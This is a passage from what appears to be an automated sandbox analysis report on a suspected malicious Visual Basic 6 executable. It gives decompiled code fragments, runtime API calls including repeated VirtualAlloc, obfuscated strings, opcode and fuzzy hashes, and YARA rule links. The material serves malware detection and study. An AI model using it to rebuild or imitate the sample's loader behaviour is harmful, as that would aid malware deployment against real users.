				_t43 =  *((intOrPtr*)( *_v84 + 0x120))(_v84,  &_v64, _t39,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x310))( *_v96));
				asm("fclex");
				_v88 = _t43;
				if(_v88 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40b0b8);
					_push(_v84);
					_push(_v88);
					L004013D8();
					_v100 = _t43;
				}
				_push(0);
				_push(0);
				_push(_v64);
				_t44 =  &_v80;
				_push(_t44); // executed
				L004013BA(); // executed
				_push(_t44);
				L0040142C();
				L0040145C();
				_push(_t44);
				_push(L"Koinciderede4");
				_push(L"Sequences");
				_push(L"TANKRENSNING"); // executed
				L0040134E(); // executed
				L00401462();
				_push( &_v64);
				_t46 =  &_v60;
				_push(_t46);
				_push(2);
				L004013C6();
				L00401450();
				_push(E0040EC53);
				L00401450();
				L00401450();
				return _t46;
			}

0x0040eafd
0x0040eb08
0x0040eb09
0x0040eb10
0x0040eb13
0x0040eb1b
0x0040eb1e
0x0040eb2b
0x0040eb36
0x0040eb42
0x0040eb5c
0x0040eb44
0x0040eb44
0x0040eb49
0x0040eb4e
0x0040eb53
0x0040eb53
0x0040eb77
0x0040eb7b
0x0040eb80
0x0040eb8f
0x0040eb95
0x0040eb97
0x0040eb9e
0x0040ebba
0x0040eba0
0x0040eba0
0x0040eba5
0x0040ebaa
0x0040ebad
0x0040ebb0
0x0040ebb5
0x0040ebb5
0x0040ebbe
0x0040ebc0
0x0040ebc2
0x0040ebc5
0x0040ebc8
0x0040ebc9
0x0040ebd1
0x0040ebd2
0x0040ebdc
0x0040ebe1
0x0040ebe2
0x0040ebe7
0x0040ebec
0x0040ebf1
0x0040ebf9
0x0040ec01
0x0040ec02
0x0040ec05
0x0040ec06
0x0040ec08
0x0040ec13
0x0040ec18
0x0040ec45
0x0040ec4d
0x0040ec52

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EB13
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EB2B
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EB36
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,?,?,?,004012A6), ref: 0040EB4E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040EB7B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000120), ref: 0040EBB0
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EBC9
__vbaStrVarMove.MSVBVM60(00000000), ref: 0040EBD2
__vbaStrMove.MSVBVM60(00000000), ref: 0040EBDC
#690.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EBF1
__vbaFreeStr.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EBF9
__vbaFreeObjList.MSVBVM60(00000002,?,?,TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EC08
__vbaFreeVar.MSVBVM60(Koinciderede4,00000000,00000000), ref: 0040EC13
__vbaFreeVar.MSVBVM60(0040EC53,Koinciderede4,00000000,00000000), ref: 0040EC45
__vbaFreeVar.MSVBVM60(0040EC53,Koinciderede4,00000000,00000000), ref: 0040EC4D

Strings

Sequences, xrefs: 0040EBE7
Koinciderede4, xrefs: 0040EBE2
TANKRENSNING, xrefs: 0040EBEC
S@, xrefs: 0040EC42

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#690CallCheckChkstkHresultLateListNew2
String ID: Koinciderede4$Sequences$S@$TANKRENSNING
API String ID: 1502117440-65157276
Opcode ID: 739ca3bc85884c76e5ee4ffa8b415b16735a234e8de6ca7e2e4a636c7bf1ded3
Instruction ID: 88d3011765c86825f715433b0a4a588c04055e9b94c902bfe230fe3336904a3f
Opcode Fuzzy Hash: 739ca3bc85884c76e5ee4ffa8b415b16735a234e8de6ca7e2e4a636c7bf1ded3
Instruction Fuzzy Hash: 6F31E771D00208ABDB04EBD1DC46FDDBBB9BB08708F50443AF502BA1E2DBB869558B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401494, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401499

Strings

VB5!6&*, xrefs: 00401494

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 5f1531d2fb89b467d0b126c01fd6579a7fd0a53dca18904d494bb9c8abe64301
Instruction ID: 526be796e69bc0304e7ee79523f2c289aa0bf57a951e65cc466ea249a68d9b5e
Opcode Fuzzy Hash: 5f1531d2fb89b467d0b126c01fd6579a7fd0a53dca18904d494bb9c8abe64301
Instruction Fuzzy Hash: 3ED0A4A445E3D01EE7836A7959AA1892FB15CA720531B48E7D090DA1F398280858D37A

Uniqueness

Uniqueness Score: -1.00%

Function 00402CFD, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Strings

W~##, xrefs: 00402CFE

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: W~##
API String ID: 4275171209-893365070
Opcode ID: bd6b7e2001aec94cc7d183e57f61e183fc3f05ae401af40ddc05c9e15a029a59
Instruction ID: 0172519709829eb1860e7bc7d6928abd5a56225a35eefe93e3a1397b24288e28
Opcode Fuzzy Hash: bd6b7e2001aec94cc7d183e57f61e183fc3f05ae401af40ddc05c9e15a029a59
Instruction Fuzzy Hash: BB5188A1A7DA01CAD2066D21C1855B06E4CEFAB353731EB7B84A7760F1763E0F4725CA

Uniqueness

Uniqueness Score: -1.00%

Function 00402EF3, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 277memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Strings

L)qZ, xrefs: 00402EF3

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: L)qZ
API String ID: 4275171209-2055255467
Opcode ID: 432d31bab356da39fd8d738fa3e36e19b0b131dd8ba0c2c712d0cb8a13bd42ff
Instruction ID: 5d065d5ba0f962feccd2bc67d7666db6d1dc8dc13e61ba3c6612a15ee7bda19d
Opcode Fuzzy Hash: 432d31bab356da39fd8d738fa3e36e19b0b131dd8ba0c2c712d0cb8a13bd42ff
Instruction Fuzzy Hash: D7518CA2E7D64189C2166D21C0815B06E4CEBA7353731DF7B8457790F1763E0F4725CA

Uniqueness

Uniqueness Score: -1.00%

Function 004027DB, Relevance: 1.8, APIs: 1, Instructions: 511COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58786f8310ecda5a86ee2feb31863ca177a271593321938a9e936f5c95a775b0
Instruction ID: 0df9210acea278e97a7d32cc448af83013c9c7d426f601243f00f638c2cb4220
Opcode Fuzzy Hash: 58786f8310ecda5a86ee2feb31863ca177a271593321938a9e936f5c95a775b0
Instruction Fuzzy Hash: 2791A986A3C6118AD6163925838C5B06A48EB7B363331DF7BC467750E276BE4F4721CE

Uniqueness

Uniqueness Score: -1.00%

Function 004023FB, Relevance: 1.7, APIs: 1, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f36816ca5af89eaf0353ef5e5d18bc2e261ceeb97e413c018ec6951f4b3674f7
Instruction ID: f2b0e2f6dc4ab9eee094c800ba006ca58595482543a9e4290e22f895b34529b4
Opcode Fuzzy Hash: f36816ca5af89eaf0353ef5e5d18bc2e261ceeb97e413c018ec6951f4b3674f7
Instruction Fuzzy Hash: E7A1DF81E7DA458AE207692086885B06948EFA7353331EF7B84B7B50E1767E0F4734CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402455, Relevance: 1.7, APIs: 1, Instructions: 472memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9fa3374ea1698e57d9314ac5a98f24119b28b1ea31379fbe16fedc653b138d57
Instruction ID: 54f93b69ac4ffc794d571bd6e47f68dc87e7524aaeabcb3f1e4404603b91548c
Opcode Fuzzy Hash: 9fa3374ea1698e57d9314ac5a98f24119b28b1ea31379fbe16fedc653b138d57
Instruction Fuzzy Hash: FC91CE91E7DA05CAE207692086885716948EFAB353331EF7B84B7754E0767E0F47348E

Uniqueness

Uniqueness Score: -1.00%

Function 004024FB, Relevance: 1.7, APIs: 1, Instructions: 462memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1425012ad56b44a7d38eaaa252f1a5f27f5fcadceecd10cbc02a52bda66146ee
Instruction ID: c85f4ba4a0959ef6b762cb3b2cce98df3ff9e70bb9c6797e82b2c39dfb223a4a
Opcode Fuzzy Hash: 1425012ad56b44a7d38eaaa252f1a5f27f5fcadceecd10cbc02a52bda66146ee
Instruction Fuzzy Hash: DD91CE91E7DA05CAD207292086885706948EFA7353331EF7B84B7754E0767E0F4B348E

Uniqueness

Uniqueness Score: -1.00%

Function 0040254D, Relevance: 1.7, APIs: 1, Instructions: 456memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 757ce65229549021e5ab56f0f7ea48c70cb845ec0c23f3a07995e14099746e14
Instruction ID: 3c5241544e35fa3d616f33b7a6bfbf716f2f2a0435dca2035871d61b7933335b
Opcode Fuzzy Hash: 757ce65229549021e5ab56f0f7ea48c70cb845ec0c23f3a07995e14099746e14
Instruction Fuzzy Hash: 4991CD91E7DA05CAD207292086886B06948EFA7353731EF7B84B7754E1767E0F4B348E

Uniqueness

Uniqueness Score: -1.00%

Function 004025F3, Relevance: 1.7, APIs: 1, Instructions: 456memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3a533b7b740f8ac27438913197fbd1da31023c40b9bfd08d6cc50ec1ec497cf5
Instruction ID: adae5fc0aa780e22f82574103f4ad1bdcab838dcf65d97344e28be3881440549
Opcode Fuzzy Hash: 3a533b7b740f8ac27438913197fbd1da31023c40b9bfd08d6cc50ec1ec497cf5
Instruction Fuzzy Hash: 9A81BD91E7DA058AE207292086885B06948EF57353731EF7B8467B54E1767E0F4B34CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040249C, Relevance: 1.7, APIs: 1, Instructions: 446memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 007c6f9d902f4c82e146359562d36ca3c2c67981898cc0ac1b0cc3e18e47f88b
Instruction ID: 1387296cf36428ef92f15363742e56588783fd7ede5ca0cd115b83087d4614f5
Opcode Fuzzy Hash: 007c6f9d902f4c82e146359562d36ca3c2c67981898cc0ac1b0cc3e18e47f88b
Instruction Fuzzy Hash: E891CD91E7DA05CAE207692086885706948EFA7353331EF7B84B7B54E1767E0F47348E

Uniqueness

Uniqueness Score: -1.00%

Function 00402695, Relevance: 1.7, APIs: 1, Instructions: 442memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1a4ee6e38be4e97608f056d230f86495a5eb5b17d798e09b1214332261d7202c
Instruction ID: 405c5b76dec56e2998c34beec2f79896a43e632973f5934727b994de7e713052
Opcode Fuzzy Hash: 1a4ee6e38be4e97608f056d230f86495a5eb5b17d798e09b1214332261d7202c
Instruction Fuzzy Hash: 2E81BD91E7DA01CAE207292086885706948EF97353731EF7B8467B54E1767E0F4B30CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040264C, Relevance: 1.7, APIs: 1, Instructions: 411memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 33d1802c483ea898454134ee37cd3f6b270c520d84243fc3caebf51bcb50aff5
Instruction ID: 3b9d0a3a45992b8f3a0ce25ff26ec939bf7df16c532f83772aa2c416ca7ca33c
Opcode Fuzzy Hash: 33d1802c483ea898454134ee37cd3f6b270c520d84243fc3caebf51bcb50aff5
Instruction Fuzzy Hash: F181BC91E7DA05CAE207292086885B06948EF97353731EF7B84A7B54E1767E0F4B34CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402598, Relevance: 1.7, APIs: 1, Instructions: 402memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c1a0e3b44c2b3a6a80d9c6bfa8e451b97aefec3ec1c8baa461ca7716330b830b
Instruction ID: 6876bc7a1dfcdd064d71cbff9ee3f70b19364131babc4578350055fe46614060
Opcode Fuzzy Hash: c1a0e3b44c2b3a6a80d9c6bfa8e451b97aefec3ec1c8baa461ca7716330b830b
Instruction Fuzzy Hash: EE91DE91E7DA41CAD207292086885B06A48EF9B353331EF7B84A7754E1767E0F4B35CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402743, Relevance: 1.6, APIs: 1, Instructions: 394memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d8bb15ebc6c105d6ad08459eb6bbc0df9f90fc4ae096e457c6af019ad01e268e
Instruction ID: cdb163e6f136a6ab138b68e3aedb6d336a8f0c49a315d628eff6d77d9f9bddbe
Opcode Fuzzy Hash: d8bb15ebc6c105d6ad08459eb6bbc0df9f90fc4ae096e457c6af019ad01e268e
Instruction Fuzzy Hash: 6081CD91E7DA05CAE207292082885B06948EFA7353731EF7B84A7754E1767E0F4B30CE

Uniqueness

Uniqueness Score: -1.00%

Function 004028D2, Relevance: 1.6, APIs: 1, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99574eb9bcfbd1f75c5431dd5cf386919545ec23cf7f70139445f2a1f5000074
Instruction ID: 4d45b8bae6da7bdfe8780cf384644aaebb5a425adac49b1dc9a9d29c3f2c0ea0
Opcode Fuzzy Hash: 99574eb9bcfbd1f75c5431dd5cf386919545ec23cf7f70139445f2a1f5000074
Instruction Fuzzy Hash: 5A71BC91E7DA05CAD207292182885B06A48EFAB353731DF7B846BB54E1763E0F4731CE

Uniqueness

Uniqueness Score: -1.00%

Function 004026E6, Relevance: 1.6, APIs: 1, Instructions: 393memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cc9b81b5bf0151403b9c5c5a90b0283fefe00d9a3e755a67323098d5f898cba2
Instruction ID: e29fc07213bd3c98302ea98ab084e13920a683ce465130a8b71039dffbb4923a
Opcode Fuzzy Hash: cc9b81b5bf0151403b9c5c5a90b0283fefe00d9a3e755a67323098d5f898cba2
Instruction Fuzzy Hash: 3981AC91E7DA01CAE207292186885B06948EFA7353731EF7B8467B54E1767E0F4B34CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402972, Relevance: 1.6, APIs: 1, Instructions: 375memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cecf3b6484717e1ebbad3862696465f271f931c553bbcb304290e6bfc60e4a5a
Instruction ID: 63efd8ab7cb680584d60346468b35441d4ce9c9de8c89d9d7355035ce7286644
Opcode Fuzzy Hash: cecf3b6484717e1ebbad3862696465f271f931c553bbcb304290e6bfc60e4a5a
Instruction Fuzzy Hash: 2B71AB91E7DA458AD207292081886B06D4CEFAB353731DB7B84A7B54E1767E0F4B31CA

Uniqueness

Uniqueness Score: -1.00%

Function 00402A6D, Relevance: 1.6, APIs: 1, Instructions: 366memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 068b45b1ca333f1b39bad5adea772235f47f57cbfb024bf534a97c7747d46040
Instruction ID: cd96676b63a3330ae2c0901f6fafc0ed4a590f33b986b81696ec651ecda588c0
Opcode Fuzzy Hash: 068b45b1ca333f1b39bad5adea772235f47f57cbfb024bf534a97c7747d46040
Instruction Fuzzy Hash: C461BA91E7DA018AD2176920C1886B06E4CEBAB353731DB7B8467B54F1763E0F4B31CA

Uniqueness

Uniqueness Score: -1.00%

Function 00402A1E, Relevance: 1.6, APIs: 1, Instructions: 366memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 801d7191a36644824d0eeafbaa41c2d5a2e7a6bcaf144ec3275053d2cd22ce1e
Instruction ID: ca1dd36a1b201a68bc715219280414b402b5c9eeb517cc0b4350c4f122d63526
Opcode Fuzzy Hash: 801d7191a36644824d0eeafbaa41c2d5a2e7a6bcaf144ec3275053d2cd22ce1e
Instruction Fuzzy Hash: 0861BB91E7DA018AD2076921C1886B0694CEFAB353731DB7B8467754F1763E0F4B31CA

Uniqueness

Uniqueness Score: -1.00%

Function 00402790, Relevance: 1.6, APIs: 1, Instructions: 366memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a13cb938010539f57a93ac69cc8fd814d85061e3b2206281c186504e854986db
Instruction ID: edab93cb7440ee4443c1f4fa2154feb261899a5f4f3435888cbb327292e497ae
Opcode Fuzzy Hash: a13cb938010539f57a93ac69cc8fd814d85061e3b2206281c186504e854986db
Instruction Fuzzy Hash: A981AC91E7DA05CAE207292181885B06948EFA7353731DB7B8477B54E1767E0F4B31CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402B17, Relevance: 1.6, APIs: 1, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 20ab99ef8d17fd641462bce8374ae33657fb7629c8ff2df921794effa885e68c
Instruction ID: f1bc96651cc75f74c994fd805e7f6e13cc559f20a074406734f80b2ba2e7f466
Opcode Fuzzy Hash: 20ab99ef8d17fd641462bce8374ae33657fb7629c8ff2df921794effa885e68c
Instruction Fuzzy Hash: 23618891E7DA408AD2066921C1895B06A4CEBAB353731DB7B80A7B50F1763E0F4735CA

Uniqueness

Uniqueness Score: -1.00%

Function 00402926, Relevance: 1.6, APIs: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b528ab145dce3cca4c9244a1697679fe789312f140cab46ee1a12019e78e5573
Instruction ID: 7430205e6c43f9b2245860804b1ed2c747620cb57313115a3c8066862d909c2e
Opcode Fuzzy Hash: b528ab145dce3cca4c9244a1697679fe789312f140cab46ee1a12019e78e5573
Instruction Fuzzy Hash: C671AA91E7DA45CAD207292081885B06A48EFAB353731DF7B84A7B54E1767E0F4B31CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402832, Relevance: 1.6, APIs: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e659f45277fd6404fa2063b489eb68d21cf7640331277a5bbc81ca40d730b90
Instruction ID: 45d509b81dfa8e3813db6c75d97ec60f84901e8b1063828b486b2697ccdd2212
Opcode Fuzzy Hash: 2e659f45277fd6404fa2063b489eb68d21cf7640331277a5bbc81ca40d730b90
Instruction Fuzzy Hash: 1D81CC91E3DA01CAD217292085885B06A48EFAB353731DB7B8467754E1763E0F4731CE

Uniqueness

Uniqueness Score: -1.00%

Function 004029BC, Relevance: 1.6, APIs: 1, Instructions: 348memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
